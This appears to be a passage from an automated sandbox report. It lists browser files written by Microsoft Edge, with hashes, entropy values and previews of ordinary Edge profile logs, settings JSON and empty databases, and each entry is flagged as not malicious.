                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                                                                              Entropy (8bit):5.076470887942506
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxvX13cM+q2PcNwi23oH+TcwtrQMxIFUt8IXfxvRMWJZmw+IXfxaaWcMVkwOck:RP13cM+vLZYebCFUt86XJ/+66cMV54Zn
                                                                                                                                                                                                                                                                              MD5:32C2A24ABB7A91C336ADE05598438AA2
                                                                                                                                                                                                                                                                              SHA1:40C09BF507C06AE8F93588E96ACE21131D6FA236
                                                                                                                                                                                                                                                                              SHA-256:3B4625F6931F3685B66FB35E2C653AAFFFD4C6F454273656EF644A0AF464DBE7
                                                                                                                                                                                                                                                                              SHA-512:69F28072C240193F21594E7B5D2745BB5243C05384B49F2841E25D3EBFA9DFE461E8D1BE3450ACE7CBD698AA2C62FC00580258C978C701C72ABAC89AE119F89A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.402 1f8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/20-02:42:13.404 1f8c Recovering log #3.2024/12/20-02:42:13.414 1f8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1443
                                                                                                                                                                                                                                                                              Entropy (8bit):3.8118343620498374
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:3384VWapsAF4unxS9tLp3X2amEtG1ChqwCEKYVy3QKkOAM4:3tFzFiXLp2FEkChTCnmbHOp
                                                                                                                                                                                                                                                                              MD5:3D8453BA95BF884985EF2F3A9BFA71FF
                                                                                                                                                                                                                                                                              SHA1:81429A332E856A1A0A60CE019C91C5BA94138EDF
                                                                                                                                                                                                                                                                              SHA-256:60CC2AD51B21C9CB4D399C249999477B7C8F23997716F79C469D1D4408B7F6FC
                                                                                                                                                                                                                                                                              SHA-512:582924EB1C2700DDD57D1544DB5D17C7B70F3057BDF7CA7E12D1795C0A68E3021668744680B908ACB86476608F6725FAFEB020F8C526944560549C284F953906
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SNSS........UF\............UF\......".UF\............UF\........UF\........UF\........UF\....!...UF\................................UF\.UF\1..,....UF\$...f2df52a8_64fc_47fc_9801_1235d6a23fa5....UF\........UF\....EnS.........UF\....UF\........................UF\....................5..0....UF\&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}......UF\........UF\...........................UF\............UF\........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......c.$.)..d.$.).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                              Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                              MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                              SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                              SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                              SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):355
                                                                                                                                                                                                                                                                              Entropy (8bit):5.160449120052655
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx04q2PcNwi23oH+Tcwt7Uh2ghZIFUt8IXfx9XZmw+IXfxgNDkwOcNwi23oH+Q:RjvLZYebIhHh2FUt86Z/+6M54ZYebIh9
                                                                                                                                                                                                                                                                              MD5:BC5B9C01E6AAE207EF3071109614A001
                                                                                                                                                                                                                                                                              SHA1:E9F52DBE43635215A222C590B8494E902FCDDB8D
                                                                                                                                                                                                                                                                              SHA-256:D1F065A90D2D49EC73AE8E1230881FF7B71F8EB1E73A536A13C12EAA7007D8FA
                                                                                                                                                                                                                                                                              SHA-512:759F8DF73E8034624AB957DDDD3256E117CDC9BCBF458906FFFF510698A8928A38F19874F9F9260A935567B6E6D08E2D9B108CE0086DE1BC7E3EC693C9A5C545
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.665 894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/20-02:42:12.666 894 Recovering log #3.2024/12/20-02:42:12.667 894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZlu7Xl/:/M/xT02zZ71
                                                                                                                                                                                                                                                                              MD5:71BAA6A91D0DEF93AE7005132F9A8DCE
                                                                                                                                                                                                                                                                              SHA1:767A3CD96AFC693CF650164F23E49A5E404EC002
                                                                                                                                                                                                                                                                              SHA-256:AE0A05DD244981577B5216D7F50D8751FC79B0B5534478F081CE6F0294CEBF8F
                                                                                                                                                                                                                                                                              SHA-512:8BD1E3908C3BB7AE653605DAB344EA7E9464B6273ECB1B69D45B37E05679AB845A3E859285AF33D73A2C6EC4718A71362FEEFC4FFB8561BD7A4B34EB0D9E1D73
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):440
                                                                                                                                                                                                                                                                              Entropy (8bit):5.220414391086673
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:RrvLZYebvqBQFUt86P4/+6Bg54ZYebvqBvJ:BlYebvZg8GVoYebvk
                                                                                                                                                                                                                                                                              MD5:9822B89A1063AF00F6EB96A08D4A77AC
                                                                                                                                                                                                                                                                              SHA1:F05C63CB718210F6A914E8635ED1E3175C3CBFDB
                                                                                                                                                                                                                                                                              SHA-256:45F9ABC7CFEACC75DE1E964B0AB39EA1855F0B527C0E7140B00914FF17CCCA7B
                                                                                                                                                                                                                                                                              SHA-512:95A4E52AA3CED4A0AE18C5D7B73AA2A157656CF5E36C25C56A5D06962CDF5FE426066EC095D60DB5F794FF403CC66E0FECBAC699CFCFAE2B951870427DD2C4FE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.430 1f98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/20-02:42:13.436 1f98 Recovering log #3.2024/12/20-02:42:13.452 1f98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):111
                                                                                                                                                                                                                                                                              Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                              MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                              SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                              SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                              SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                              Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                              MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                              SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                              SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                              SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):111
Entropy (8bit):4.718418993774295
Encrypted:false
Malicious:false
Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):80
Entropy (8bit):3.4921535629071894
Encrypted:false
Malicious:false
Preview:*...#................version.1..namespace-..&f.................&f...............
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):428
Entropy (8bit):5.202482967480862
Encrypted:false
Malicious:false
Preview:2024/12/20-02:42:31.611 1f8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/20-02:42:31.613 1f8c Recovering log #3.2024/12/20-02:42:31.617 1f8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):331
Entropy (8bit):5.157030042486625
Encrypted:false
Malicious:false
Preview:2024/12/20-02:42:12.669 4e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/20-02:42:12.674 4e4 Recovering log #3.2024/12/20-02:42:12.682 4e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:dropped
Size (bytes):196608
Entropy (8bit):1.265412664866743
Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                              Entropy (8bit):0.466503496752501
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0jhU:v7doKsKuKZKlZNmu46yjx0i
                                                                                                                                                                                                                                                                              MD5:D0F725A53FBF05E883877603B7BB8B76
                                                                                                                                                                                                                                                                              SHA1:E23216F9E22CFFACD00CAACA11D35B8E05F5919E
                                                                                                                                                                                                                                                                              SHA-256:56D6F9DA0DCC88BB0E74C4D10FCF954F2A4FEA74FE292F2BF224A5F088EC8B95
                                                                                                                                                                                                                                                                              SHA-512:E964DE8D8D2D4D68D94A882C6C70B1EAC481D53C93627D85D166760F1ED9DC40C95C890FD7A59FB7412CB71A0001AAF7FFB01014542DCB424C4DF5A3A9538C28
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11755
                                                                                                                                                                                                                                                                              Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                              MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                              SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                              SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                              SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (17550), with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):17554
                                                                                                                                                                                                                                                                              Entropy (8bit):5.492037500755213
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0J99QTryDiuabatSuypNspFyaNPWc+ktaNNPhACnNWcVCUD913nho68WbV+FeC:st0PGQSu4NspFtJWzVCU/nbGkQwFFM
                                                                                                                                                                                                                                                                              MD5:16622B86FF23E54350A7844C65515E2C
                                                                                                                                                                                                                                                                              SHA1:1AD17EF3076CCCAF2A6E3C84D070D5611817DE16
                                                                                                                                                                                                                                                                              SHA-256:6A781519CBD2E13B9179AEE78E5EADC1CB3008F2613773E76A3C53E2EBD2E82D
                                                                                                                                                                                                                                                                              SHA-512:4E91AFA52142CA8C1FFBDB3D356AB12E74594B734140CB54E58456D5455DB594EB8A7A5F2BFFDC31AE554A8377E5DD445B6D8606DF1546D8366B29B8F1709D14
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):115717
                                                                                                                                                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                              Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                              MD5:98643AF1CA5C0FE03CE8C687189CE56B
